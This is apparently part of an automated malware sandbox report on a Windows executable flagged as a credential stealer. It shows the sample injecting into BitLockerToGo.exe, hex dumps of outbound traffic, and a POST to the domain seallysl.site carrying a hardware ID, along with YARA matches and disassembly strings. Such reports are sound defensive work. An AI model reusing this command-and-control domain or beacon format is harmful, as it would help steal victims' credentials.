2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: 4c a1 1c 08 f6 12 1e 39 58 da 56 cd 7b 05 84 38 4d 73 bc 72 51 51 3e c4 dd 6d d2 25 93 97 84 8d 9a c0 60 f2 96 13 cc 9c a0 91 a0 3a 93 13 0f 28 0d 56 05 c6 e1 1e f9 b0 92 e0 e2 fb 80 49 87 79 fc 91 17 22 0d 4e 51 bf 65 8f 10 3f 24 98 db 86 79 71 de b3 4b 8b e5 5a 1e 6c 9a 97 4f 1b 4d d2 4b fe 9d 15 47 99 bb 44 5e a0 de ec dc 75 d2 90 e1 f4 a1 f6 4e aa e2 32 43 37 93 5e 22 6a 74 25 64 f6 2b b9 2e a8 58 a7 f6 a7 88 9a 4a dc 07 7b 58 17 eb e7 05 3e 62 13 9d ce 63 32 4c f5 4a f0 2e 9a f8 b5 43 47 c3 1c 8f 24 0e 91 4e 8d cd 50 a6 b5 6a c5 ea 7c df e7 dc dd 3b 20 f1 f8 0d 55 6b 9b c8 1b 51 84 d9 9b af 6b 35 10 7e 04 40 2a 63 7e 58 27 9f 41 e9 61 1b e7 9f 28 03 7a 99 39 97 8a 7c 65 14 a1 f0 68 e2 74 d4 e6 ed 00 0d b5 66 e4 36 f6 e6 47 89 8f f4 95 9a 24 25 7e 70 Data Ascii: L9XV{8MsrQQ>m%`:(VIy"NQe?$yqKZlOMKGD^uN2C7^"jt%d+.XJ{X>bc2LJ.CG$NPj\|; UkQk5~@*c~X'Aa(z9\|ehtf6G$%~p
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: 2b c6 af 14 b7 a1 66 fa 83 50 ac ab 87 55 6e f4 06 5f 0a a3 a5 47 15 68 b1 8f 70 37 46 83 c8 0c 7a 98 8f 1f 49 45 8d ab 05 41 84 78 95 4a b4 49 da 61 f0 70 de 29 60 eb 6d e3 0c 79 7a f2 c7 e1 35 85 97 b3 91 cb 5a e4 84 21 f4 46 4e a0 dc 60 a5 0e 14 f6 84 4b 42 49 af 69 a3 70 f7 ce 69 3f e5 ae 60 90 4b 78 02 17 fc f7 89 03 e1 7d 24 c6 50 4c b4 cc 32 51 65 8c fb 3a 14 15 1a 7e 94 11 ca d5 22 0c 33 c4 16 19 d6 47 5d af 1b 59 39 61 b6 a2 16 b0 3f cf d1 a7 58 16 09 4e 2f 03 3d cc 54 b2 67 2b 77 78 d6 fa 93 2a 57 24 a6 d4 6a cb d0 71 22 ae 0d a5 5b a2 50 9d f8 23 4a 91 60 58 b3 16 17 31 8e 1c bb c6 df d0 e3 63 7f 05 6f 60 e5 3c 64 e1 84 d8 18 16 ff c8 f0 23 27 e1 10 86 58 8b d9 c4 9e 7b 6b f6 8a e1 c1 47 f6 2c de 90 9b c8 f3 6c 22 97 6c 5f 86 5e 34 19 a9 2e 70 Data Ascii: +fPUn_Ghp7FzIEAxJIap)`myz5Z!FN`KBIipi?`Kx}$PL2Qe:~"3G]Y9a?XN/=Tg+wx*W$jq"[P#J`X1co`<d#'X{kG,l"l_^4.p
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: bc af 2c dc f7 64 82 3f b1 1c 3f 74 7d 67 f7 65 ca a9 4d 25 4f c0 e1 78 03 a5 4a 01 26 9a 20 ef cb 86 05 07 3c e6 b8 31 7d 0d f7 48 3e 65 f0 a8 c1 b9 9c d8 f4 73 c3 ac db 6f 91 ce 32 85 c7 1a 0a 21 c1 f2 a8 95 fb db c9 c9 51 e5 21 fd c4 a2 2f b5 af 59 d6 53 37 9b 52 dc d4 f9 e9 f9 91 57 c2 52 0e c6 f4 2d 1b b7 2c 7e 41 fe 1d a4 3b 36 ab 47 0f 62 89 0e 62 c2 28 32 cc b8 31 97 a6 5e 2e f2 5d c7 8d f8 f6 36 8f 09 d0 35 aa b9 be 07 88 6d 40 27 16 ee fc 6d b6 cc 18 38 2f 7a 7d 73 95 61 b9 ac a8 27 6a 67 97 4d cc 12 01 2b aa 44 2f af 31 89 1f 95 75 ed 81 b3 10 5c f5 38 c9 92 ac de 23 70 7f 04 1a fb 8d 80 6d f4 6b d9 c6 8c 3d 40 30 cb b4 1b 11 9f 2e ce 73 92 2c 39 25 8f 7f 16 a9 69 88 5f d0 87 eb 97 f8 c0 97 c8 82 8a 3b 70 a8 f0 11 5a 82 2a b0 9b f9 3b fe 8c dd Data Ascii: ,d??t}geM%OxJ& <1}H>eso2!Q!/YS7RWR-,~A;6Gbb(21^.]65m@'m8/z}sa'jgM+D/1u\8#pmk=@0.s,9%i_;pZ*;
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: b1 00 c9 23 44 e4 8d e2 02 8e 92 e5 48 f6 5d 24 57 be fc ac eb 3f 32 ea d0 39 df 6c 8d 42 84 b1 c7 16 72 97 94 31 a0 78 ce 10 22 d0 d3 b5 98 e6 14 14 62 f3 e7 24 70 de 93 e2 56 e3 83 be 6a e6 b4 18 ad 26 e4 1a 00 a2 9f 50 cd 9c 98 f1 de a0 5e 91 36 bd 59 1f 44 a4 11 69 7a 4a 5b 34 7e 77 92 24 ef 4d 1f 0d 0d 94 7f e5 5e 88 c8 ae 7e 10 2e 95 c3 42 f2 35 71 cc 15 1d eb c5 10 ef a7 cb c6 78 27 47 e8 c3 7c af 16 f2 3d 07 38 3d 45 70 a8 0f 4a cf 9f d0 69 e5 79 78 25 2c f3 f4 1e 36 10 08 e6 e2 78 37 6b 6a 15 81 e4 11 2a 95 cd 4c af 40 cc df 5f 85 be 89 c5 f5 87 fa 82 17 7d 73 67 3a 9a 5c d0 a1 3d bb c9 eb 8d c7 70 65 0c 57 85 c2 c6 90 7e 6c 9c ee 27 d9 d4 30 19 80 98 ae e5 3c dd 81 49 1e e5 63 ce a2 96 ea 83 c3 88 8d e1 b7 6d 77 5a 94 d9 11 a9 c3 03 6b 27 49 b7 Data Ascii: #DH]$W?29lBr1x"b$pVj&P^6YDizJ[4~w$M^~.B5qx'G\|=8=EpJiyx%,6x7kj*L@_}sg:\=peW~l'0<IcmwZk'I
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: 85 5c 86 62 6a ab 6f 9c b3 40 d0 d2 16 c2 cb 50 48 74 9d fd d6 c5 f1 54 ec e6 3e 54 ae 2a 39 66 ca ef 81 9f 19 88 f1 b1 18 80 63 d7 4f 62 90 da d8 23 ad 7c be 7a e5 8e 3e 2b dc 52 3d cc e0 00 10 9e 7f bb d5 5d 6b 54 5b 93 21 c1 d9 0e 5e 4c 09 14 22 d8 e4 ae d1 7b 46 f8 3d 67 1e 4f f8 16 71 f6 8a 59 72 eb 83 3b e4 e5 dd 8e b0 a6 40 59 77 9c 74 80 b5 c7 72 83 a0 7a 1b 8a ec 20 81 62 ba 8b c2 94 30 7f ec 26 7a 75 44 e3 53 78 de e8 cc c5 42 77 28 c3 d9 53 59 c2 13 a6 b9 ca cd 98 f7 44 7f 52 73 ab 8e 08 89 e1 ec 53 88 f5 8b 41 f2 64 8d 91 04 9f 0d bb c1 9a 67 02 a9 7f dc 07 e8 b1 a0 ee 4f 96 2a 83 f8 35 2e de 20 cc a0 8c 1d 20 d7 ca 92 3e e1 62 62 10 82 cb 4c f7 c3 4d 0e b2 d8 e3 cb a7 3e e1 20 c0 3f eb ed fe 59 3e 7b e3 f0 99 9b 2b 82 e0 cd 5e 9b be e8 6b a7 Data Ascii: \bjo@PHtT>T9fcOb#\|z>+R=]kT[!^L"{F=gOqYr;@Ywtrz b0&zuDSxBw(SYDRsSAdgO5. >bbLM> ?Y>{+^k
2024-10-29 17:39:46 UTC	1018	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:39:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=83jv4826kh6n7c963q2bgsokpp; expires=Sat, 22 Feb 2025 11:26:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wa4z7z%2FDmA116B%2FOE0vyDkx4XM1Md%2FLSwvSseGtSnIm4m8xpU8G%2BJoDQi3176SfE5h%2F9DDWayZx3vFa3FjeTNlCJp7q4Ud8qQfRL%2BWinvGSJ8ukVFwiTaHi3PA4h5l%2BC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4f2593d82b08e-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19876&sent=170&recv=492&lost=0&retrans=0&sent_bytes=2831&recv_bytes=577306&delivery_rate=146536&cwnd=32&unsent_bytes=0&cid=0f1690564f9bd923&ts=1968&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49905	172.67.180.76	443	3060	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:39:46 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: seallysl.site
2024-10-29 17:39:46 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 6b 66 53 35 66 2d 2d 26 6a 3d 26 68 77 69 64 3d 34 41 30 33 43 30 38 38 30 32 35 42 42 43 32 32 33 32 42 37 45 46 33 44 31 44 45 30 46 44 38 34 Data Ascii: act=get_message&ver=4.0&lid=MkfS5f--&j=&hwid=4A03C088025BBC2232B7EF3D1DE0FD84
2024-10-29 17:39:47 UTC	1002	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:39:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oi5c3o0osn5k8su1dtsb3978h3; expires=Sat, 22 Feb 2025 11:26:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7x762%2BYn%2FwfI2IJeUs6ghMqHh1Qi7mM3rUXUu6tEzkolvbcqBmU3tQ5vR6BhEeof4UQsv3LQU6%2BBs1hcS1Qs9UF28eBDlgyRj78aUNuTGlEY14FDXnDleAYSBqhpuaKl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4f269ce5b8834-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17902&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=974&delivery_rate=160897&cwnd=32&unsent_bytes=0&cid=de7ca58b170605f7&ts=337&x=0"
2024-10-29 17:39:47 UTC	54	IN	Data Raw: 33 30 0d 0a 4c 68 50 57 70 6a 53 67 6b 58 30 7a 74 34 6f 30 6b 6d 7a 4c 4f 61 71 58 51 73 4b 4c 42 66 50 33 6d 4e 73 37 6a 75 53 79 78 45 64 31 54 67 3d 3d 0d 0a Data Ascii: 30LhPWpjSgkX0zt4o0kmzLOaqXQsKLBfP3mNs7juSyxEd1Tg==
2024-10-29 17:39:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	13:39:05
Start date:	29/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xcc0000
File size:	11'810'304 bytes
MD5 hash:	3A408188540D593A618C37FF3B9FA378
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2425522416.000000000288C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:39:14
Start date:	29/10/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xa00000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2470652028.000000000301B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2448144010.000000000301B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2484428826.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2485459206.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2502480428.0000000003025000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2500622439.000000000301B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2502274755.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2484171723.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2502495771.000000000302A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2483985363.000000000301B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00CFB560 Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=trailing bytes in data buffer passed to cid Castreflect: CallSlice with too many input argumentsparameter dest is re, xrefs: 00CFB85D
%, xrefs: 00CFB8C1
runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!reflect: Bits of non-arithmetic Type reflect: NumField of non-struct type r, xrefs: 00CFB8B8
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocbor input should not contain empty addressesexpected 1 as the cid version numbe, xrefs: 00CFB884
runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 00CFB7CE
bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)short bufferdbl-sha2-256fil/1/systemfil/1/reward has no , xrefs: 00CFB7A7
VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerreflect: Method index out of rangereflect: ChanDir of non-chan type reflect: Field of non-, xrefs: 00CFB802
runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocbor input should not contain empty addressesexpected 1 as the cid version number, got: %dreflect: nil type passed to Type.As, xrefs: 00CFB829

Memory Dump Source

Source File: 00000000.00000002.2420493820.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2420436560.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2421915055.00000000010CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2421915055.00000000014A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422419916.000000000179D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422435461.000000000179E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422451779.00000000017A1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422467074.00000000017A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422486528.00000000017A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422503971.00000000017A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422520584.00000000017A5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422543510.00000000017BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422565005.00000000017BC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422585602.00000000017BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422585602.00000000017D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422585602.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422585602.000000000180C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422668629.0000000001811000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422688812.0000000001812000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2422688812.000000000184C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: %$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=trailing bytes in data buffer passed to cid Castreflect: CallSlice with too many input argumentsparameter dest is re$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerreflect: Method index out of rangereflect: ChanDir of non-chan type reflect: Field of non-$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)short bufferdbl-sha2-256fil/1/systemfil/1/reward has no $runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocbor input should not contain empty addressesexpected 1 as the cid version numbe$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!reflect: Bits of non-arithmetic Type reflect: NumField of non-struct type r$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocbor input should not contain empty addressesexpected 1 as the cid version number, got: %dreflect: nil type passed to Type.As$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
API String ID: 0-319671828
Opcode ID: e78558def89b4060acf520b96404e054224f46fd65ab1f711738a3861d69dea9
Instruction ID: bf09ba9277e42f3be8559a2000bb053971f1f655bf2958c0761867b06ae6296a
Opcode Fuzzy Hash: e78558def89b4060acf520b96404e054224f46fd65ab1f711738a3861d69dea9
Instruction Fuzzy Hash: A991FDB45087059FD354EF68D095B2ABBE4FF89704F00892CE49887392D7759A88CF63

Analysis Process: BitLockerToGo.exePID: 3060, Parent PID: 3796COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	37.4%
Total number of Nodes:	182
Total number of Limit Nodes:	10

Executed Functions

Function 00410130 Relevance: 43.9, APIs: 4, Strings: 20, Instructions: 1884COMMON

Download Yara Rule

Strings

_], xrefs: 00410AD2
K=C#, xrefs: 00410325
{){/, xrefs: 00410346
d5h;, xrefs: 0041030F
=i<o, xrefs: 0041015A
f[zU, xrefs: 004115EA
;:54, xrefs: 00411805
xr, xrefs: 00411273
`1d7, xrefs: 00410304
J!G', xrefs: 00410330
F], xrefs: 00410AE0
#Tw, xrefs: 00410E4F
4A03C088025BBC2232B7EF3D1DE0FD84, xrefs: 0041093E
U`3, xrefs: 004102F9
Noni, xrefs: 004115FF
seallysl.site, xrefs: 00410419, 00410BEF, 00410C2C, 0041137A
;:54, xrefs: 0041175C
T1S7, xrefs: 004112D5
{-S, xrefs: 00410351
V[, xrefs: 00410AE7

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #Tw$4A03C088025BBC2232B7EF3D1DE0FD84$;:54$;:54$=i<o$F]$J!G'$K=C#$Noni$T1S7$U`3$V[$_]$`1d7$d5h;$f[zU$seallysl.site$xr${){/${-S
API String ID: 0-3325682817
Opcode ID: f8ab64ea4c7e8e210182be6e25d8877d480a05b41285a1b532a597eb8aa41f09
Instruction ID: 6273a6f89015048420069fd8e76e9716c3636ab33a276e99926261cacd246b67
Opcode Fuzzy Hash: f8ab64ea4c7e8e210182be6e25d8877d480a05b41285a1b532a597eb8aa41f09
Instruction Fuzzy Hash: 9ED243B56047408FD3248F25D88176BBBF1FF86304F18856DE5968B3A2D779E806CB86

Function 0042EB60 Relevance: 32.6, APIs: 5, Strings: 12, Instructions: 2801COMMON

Download Yara Rule

Strings

Y?^i, xrefs: 0042EC80
'Rx/, xrefs: 0042F5FB
ODIF, xrefs: 0042ECDA
syrh, xrefs: 00430234
*JZ, xrefs: 00430113
vNHF, xrefs: 0042F2F2
"JZ, xrefs: 004300DD
fjnr, xrefs: 0042F3C8
kk, xrefs: 004309D6
,C, xrefs: 0042F4A3
34t, xrefs: 00430C57
#v, xrefs: 0042F867, 00430C41

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "JZ$'Rx/$*JZ$,C$34t$ODIF$Y?^i$fjnr$kk$syrh$vNHF$#v
API String ID: 0-836178142
Opcode ID: f1385e0472e737411eb293167e93e2b1d896b708bed0ee908690dfc3b3201680
Instruction ID: 1668301a4a25afde2e4d19bd0ad22d91ff18bef6338bf9f0b8afd95663acfb5e
Opcode Fuzzy Hash: f1385e0472e737411eb293167e93e2b1d896b708bed0ee908690dfc3b3201680
Instruction Fuzzy Hash: F7131874604B908BE7358F35D4A07A3BBE1AF57304F4889AEC1EB4B386D779A409CB15

Function 00410118 Relevance: 29.8, APIs: 4, Strings: 12, Instructions: 1780COMMON

Download Yara Rule

Strings

F], xrefs: 00410AE0
#Tw, xrefs: 00410E4F
4A03C088025BBC2232B7EF3D1DE0FD84, xrefs: 0041093E
_], xrefs: 00410AD2
Noni, xrefs: 004115FF
seallysl.site, xrefs: 00410419, 00410BEF, 00410C2C, 0041137A
f[zU, xrefs: 004115EA
;:54, xrefs: 00411805
xr, xrefs: 00411273
;:54, xrefs: 0041175C
T1S7, xrefs: 004112D5
V[, xrefs: 00410AE7

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #Tw$4A03C088025BBC2232B7EF3D1DE0FD84$;:54$;:54$F]$Noni$T1S7$V[$_]$f[zU$seallysl.site$xr
API String ID: 0-519972581
Opcode ID: b0442be8fbfaddd4d400ec01b602989528da55d0bda54cb2a5bd8dac2407de0e
Instruction ID: 2214ddb4aa977259affe9d128b542b83af94708bdbd03a589afbbb747fa6f94c
Opcode Fuzzy Hash: b0442be8fbfaddd4d400ec01b602989528da55d0bda54cb2a5bd8dac2407de0e
Instruction Fuzzy Hash: 43C264B56047408FD3248F25D891727BBF1FF86304F1885ADE4968B7A2D77AE806CB85

Function 0042F4DD Relevance: 22.9, APIs: 5, Strings: 7, Instructions: 1934COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042F89E
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042F986
GetPhysicallyInstalledSystemMemory.KERNELBASE(00000000), ref: 0043009C

Strings

Y?^i, xrefs: 0042EC80
'Rx/, xrefs: 0042F5FB
ODIF, xrefs: 0042ECDA
syrh, xrefs: 00430234
*JZ, xrefs: 00430113
vNHF, xrefs: 0042F2F2
"JZ, xrefs: 004300DD
fjnr, xrefs: 0042F3C8
kk, xrefs: 004309D6
,C, xrefs: 0042F4A3
34t, xrefs: 00430C57
#v, xrefs: 0042F867, 00430C41

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ComputerName$InstalledMemoryPhysicallySystem
String ID: "JZ$'Rx/$*JZ$,C$34t$ODIF$Y?^i$fjnr$kk$syrh$vNHF$#v
API String ID: 1996838884-836178142
Opcode ID: 69b1267634a027b30bf6912e36c04a49f7f474b4ea68692130fd7d15f13d2561
Instruction ID: 720d6aa5ae566c4ed92dd2e9e444606c90beba08f29df70a540f1b78ea5a33a4
Opcode Fuzzy Hash: 69b1267634a027b30bf6912e36c04a49f7f474b4ea68692130fd7d15f13d2561
Instruction Fuzzy Hash: C1D2D775604B818FE7258F35D4A07A3BBE1AF57304F4889AEC0EB4B782D779A409CB15

Function 0043A97E Relevance: 19.8, APIs: 9, Strings: 2, Instructions: 587
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 0043A9E1
SysAllocString.OLEAUT32 ref: 0043AA7E

Strings

;:54, xrefs: 0043AFFE
;:54, xrefs: 0043AF35

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: ;:54$;:54
API String ID: 2525500382-2193779323
Opcode ID: 5a2d59dda4199b9ba7836554c8fddcc4131909e2c835070e86cdbcb1c4dc86dd
Instruction ID: 2cdab4973b36a2ceba13e1940af5890ec94b31d07d7f00d7a7e93af7ed3afa87
Opcode Fuzzy Hash: 5a2d59dda4199b9ba7836554c8fddcc4131909e2c835070e86cdbcb1c4dc86dd
Instruction Fuzzy Hash: 9012657AA00701DFD724CF25D880B2AB7B2FF8A300F14856DD5968B7A1D739E816CB84

Function 0040F970 Relevance: 15.3, Strings: 12, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x%F', xrefs: 0040F9E0
@=E?, xrefs: 0040FA10
EG, xrefs: 0040FAD6
U?W, xrefs: 0040FB02
Q!R#, xrefs: 0040F9E8
Z-^/, xrefs: 0040F9F0
Y[, xrefs: 0040FB23
S)J+, xrefs: 0040F9F8
?u>w, xrefs: 0040FAAA
IK, xrefs: 0040FAF7
A"C, xrefs: 0040FAE1
,q's, xrefs: 0040FAB5

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,q's$?u>w$@=E?$Q!R#$S)J+$Z-^/$x%F'$A"C$EG$IK$U?W$Y[
API String ID: 0-4103194446
Opcode ID: 38d6e17d5d5f30f8522ffdc8797ba47be44b4efac9c64b10ec585a43f3c3484b
Instruction ID: 3bf8773f276f2bf1a463441d0ee52f8961004a9cbde5b488764d3c6ba164dd2e
Opcode Fuzzy Hash: 38d6e17d5d5f30f8522ffdc8797ba47be44b4efac9c64b10ec585a43f3c3484b
Instruction Fuzzy Hash: F2B188B46483809FE3348F61E89179BBBA1EBD6300F148A2DE1D91B395C7B48805CF86

